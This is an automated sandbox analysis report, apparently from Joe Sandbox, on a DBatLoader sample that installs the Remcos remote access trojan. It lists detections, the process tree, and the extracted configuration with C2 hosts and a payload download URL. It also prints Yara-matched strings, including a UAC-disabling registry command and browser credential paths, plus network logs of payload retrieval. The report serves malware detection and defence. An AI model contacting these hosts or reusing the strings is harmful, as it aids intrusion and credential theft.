
Windows Analysis Report
SEPTobn3BR.exe

Overview

General Information

Sample name: SEPTobn3BR.exe (renamed because the original name is a hash value)
Original sample name: ccdcd04a0ffde31366754018598eb02f.exe
Analysis ID: 1578037
MD5: ccdcd04a0ffde31366754018598eb02f
SHA1: 38492826e8febf5bd7da4f9d8a8379ec7044ca9a
SHA256: 63c77a3f6cfa94cbc6a4c0c1475f02520592e58d6a03e8553e77a85a3f03c32f
Tags: exe, user-abuse_ch

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
AI detected suspicious sample
Allocates many large memory chunks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Drops PE files with a suspicious file extension
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queues an APC in another process (thread injection)
Sample is not signed and drops a device driver
Sigma detected: DLL Search Order Hijacking Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Creation with Colorcpl
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • SEPTobn3BR.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\SEPTobn3BR.exe" MD5: CCDCD04A0FFDE31366754018598EB02F)
    • cmd.exe (PID: 7868 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • colorcpl.exe (PID: 7920 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • Emxwenem.PIF (PID: 8112 cmdline: "C:\Users\Public\Libraries\Emxwenem.PIF" MD5: CCDCD04A0FFDE31366754018598EB02F)
    • cmd.exe (PID: 8176 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • colorcpl.exe (PID: 3232 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • Emxwenem.PIF (PID: 816 cmdline: "C:\Users\Public\Libraries\Emxwenem.PIF" MD5: CCDCD04A0FFDE31366754018598EB02F)
    • cmd.exe (PID: 5140 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • colorcpl.exe (PID: 6756 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Download Url": ["https://www.maan2u.com/docs/233_Emxwenemixg"]}
{"Host:Port:Password": ["185.174.103.111:2404:1", "185.174.103.111:2468:1", "apostlejob2.duckdns.org:2468:1", "apostlejob2.duckdns.org:2404:1"], "Assigned name": "Big Money 1", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-3W4HX7", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author | Strings
00000005.00000002.3812934475.00000000313BF000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000D.00000002.1623286615.000000001ECB8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000000.00000002.1421740936.00000000022C6000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x691e0:$a1: Remcos restarted by watchdog!
  • 0x69738:$a3: %02i:%02i:%02i:%03i
  • 0x69abd:$a4: * Remcos v
[33 further entries not shown]

Source | Rule | Description | Author | Strings
13.2.colorcpl.exe.2c00000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
13.2.colorcpl.exe.2c00000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x691e0:$a1: Remcos restarted by watchdog!
  • 0x69738:$a3: %02i:%02i:%02i:%03i
  • 0x69abd:$a4: * Remcos v
13.2.colorcpl.exe.2c00000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x641e4:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6320c:$str_b2: Executing file:
  • 0x64328:$str_b3: GetDirectListeningPort
  • 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x63e30:$str_b7: \update.vbs
  • 0x63234:$str_b9: Downloaded file:
  • 0x63220:$str_b10: Downloading file:
  • 0x632c4:$str_b12: Failed to upload file:
  • 0x642f0:$str_b13: StartForward
  • 0x64310:$str_b14: StopForward
  • 0x63dd8:$str_b15: fso.DeleteFile "
  • 0x63d6c:$str_b16: On Error Resume Next
  • 0x63e08:$str_b17: fso.DeleteFolder "
  • 0x632b4:$str_b18: Uploaded file:
  • 0x63274:$str_b19: Unable to delete:
  • 0x63da0:$str_b20: while fso.FileExists("
  • 0x63749:$str_c0: [Firefox StoredLogins not found]
13.2.colorcpl.exe.2c00000.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer | detects Windows executables potentially bypassing UAC using eventvwr.exe | ditekSHen
  • 0x63100:$s1: \Classes\mscfile\shell\open\command
  • 0x63160:$s1: \Classes\mscfile\shell\open\command
  • 0x63148:$s2: eventvwr.exe
5.2.colorcpl.exe.3090000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
[24 further entries not shown]

                System Summary

Source: File created | Author: frack113, Nasreddine Bencherchali | Data: EventID: 11, Image: C:\Users\user\Desktop\SEPTobn3BR.exe, ProcessId: 7648, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Users\Public\Libraries\Emxwenem.PIF" , CommandLine: "C:\Users\Public\Libraries\Emxwenem.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Emxwenem.PIF, NewProcessName: C:\Users\Public\Libraries\Emxwenem.PIF, OriginalFileName: C:\Users\Public\Libraries\Emxwenem.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\Public\Libraries\Emxwenem.PIF" , ProcessId: 8112, ProcessName: Emxwenem.PIF
Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\SEPTobn3BR.exe, ProcessId: 7648, TargetFilename: C:\Windows \SysWOW64\svchost.exe
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Emxwenem.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SEPTobn3BR.exe, ProcessId: 7648, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Emxwenem
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Emxwenem.PIF" , ParentImage: C:\Users\Public\Libraries\Emxwenem.PIF, ParentProcessId: 8112, ParentProcessName: Emxwenem.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 8176, ProcessName: cmd.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 7920, TargetFilename: C:\Users\user
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Emxwenem.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SEPTobn3BR.exe, ProcessId: 7648, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Emxwenem
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: "C:\Users\Public\Libraries\Emxwenem.PIF" , CommandLine: "C:\Users\Public\Libraries\Emxwenem.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Emxwenem.PIF, NewProcessName: C:\Users\Public\Libraries\Emxwenem.PIF, OriginalFileName: C:\Users\Public\Libraries\Emxwenem.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\Public\Libraries\Emxwenem.PIF" , ProcessId: 8112, ProcessName: Emxwenem.PIF

                Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 7920, TargetFilename: C:\ProgramData\remcos\logs.dat

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-19T08:00:24.178681+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49710 | 103.82.231.117 | 443 | TCP
2024-12-19T08:00:30.775132+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49725 | 185.174.103.111 | 2404 | TCP
2024-12-19T08:00:33.888987+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.7 | 49736 | 178.237.33.50 | 80 | TCP


                AV Detection

Source: SEPTobn3BR.exe | Avira: detected
Source: C:\Users\Public\Libraries\Emxwenem.PIF | Avira: detection malicious, Label: HEUR/AGEN.1326052
Source: SEPTobn3BR.exe | Malware Configuration Extractor: DBatLoader {"Download Url": ["https://www.maan2u.com/docs/233_Emxwenemixg"]}
Source: 0000000D.00000002.1623286615.000000001ECB8000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["185.174.103.111:2404:1", "185.174.103.111:2468:1", "apostlejob2.duckdns.org:2468:1", "apostlejob2.duckdns.org:2404:1"], "Assigned name": "Big Money 1", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-3W4HX7", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
Source: C:\Users\Public\Libraries\Emxwenem.PIF | ReversingLabs: Detection: 55%
Source: SEPTobn3BR.exe | Virustotal: Detection: 66%
Source: SEPTobn3BR.exe | ReversingLabs: Detection: 55%
Source: Yara match | File source: 13.2.colorcpl.exe.2c00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.3090000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.colorcpl.exe.2990000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.colorcpl.exe.2990000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.3090000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.colorcpl.exe.2c00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SEPTobn3BR.exe.2b80000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.3812934475.00000000313BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1623286615.000000001ECB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3812571420.00000000311A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1526792578.0000000000758000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3812685840.00000000311F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.2755366865.00000000311F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1449264347.000000007E8E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3812571420.00000000311CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SEPTobn3BR.exe PID: 7648, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 7920, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 3232, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 6756, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\Public\Libraries\Emxwenem.PIF | Joe Sandbox ML: detected
Source: SEPTobn3BR.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030C15EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,5_2_030C15EC
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029C15EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,10_2_029C15EC
Source: SEPTobn3BR.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: SEPTobn3BR.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 103.82.231.117:443 -> 192.168.2.7:49710 version: TLS 1.2
                Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdb source: SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.00000000209F6000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F110000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdbGCTL source: SEPTobn3BR.exe, 00000000.00000003.1403060666.0000000021B12000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.00000000209F6000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403060666.0000000021B41000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F110000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1518883152.0000000000843000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1518883152.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007EE000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02B858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02B858B4
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_0309838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_0309838E
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_0309B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_0309B28E
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030AA01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_030AA01B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030987A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_030987A0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030DBA59 FindFirstFileExA,5_2_030DBA59
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_0309AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0309AA71
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030A7AAB FindFirstFileW,FindNextFileW,FindNextFileW,5_2_030A7AAB
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_03097848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_03097848
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030968CD FindFirstFileW,FindNextFileW,5_2_030968CD
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_0309AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0309AC78
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_0299B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,10_2_0299B28E
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_0299838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_0299838E
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029AA01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,10_2_029AA01B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029987A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_029987A0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029A7AAB FindFirstFileW,FindNextFileW,FindNextFileW,10_2_029A7AAB
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029DBA59 FindFirstFileExA,10_2_029DBA59
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_0299AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_2_0299AA71
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029968CD FindFirstFileW,FindNextFileW,10_2_029968CD
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_02997848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,10_2_02997848
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_0299AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_2_0299AC78
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_03096D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_03096D28

                Networking

Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49725 -> 185.174.103.111:2404
Source: Malware configuration extractor | URLs: https://www.maan2u.com/docs/233_Emxwenemixg
Source: Malware configuration extractor | URLs: apostlejob2.duckdns.org
Source: Malware configuration extractor | IPs: 185.174.103.111
Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02B9E2F8 InternetCheckConnectionA,0_2_02B9E2F8
Source: global traffic | TCP traffic: 192.168.2.7:49725 -> 185.174.103.111:2404
Source: global traffic | HTTP traffic detected:
    GET /json.gp HTTP/1.1
    Host: geoplugin.net
    Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | ASN Name: ASN-QUADRANET-GLOBALUS
Source: Joe Sandbox View | ASN Name: GIGABIT-MYGigabitHostingSdnBhdMY
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49710 -> 103.82.231.117:443
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49736 -> 178.237.33.50:80
Source: global traffic | HTTP traffic detected:
    GET /docs/233_Emxwenemixg HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: www.maan2u.com
Source: unknown | TCP traffic detected without corresponding DNS query: 185.174.103.111
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030A936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, | 5_2_030A936B
                Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
                Source: global traffic | DNS traffic detected: DNS query: www.maan2u.com
                Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
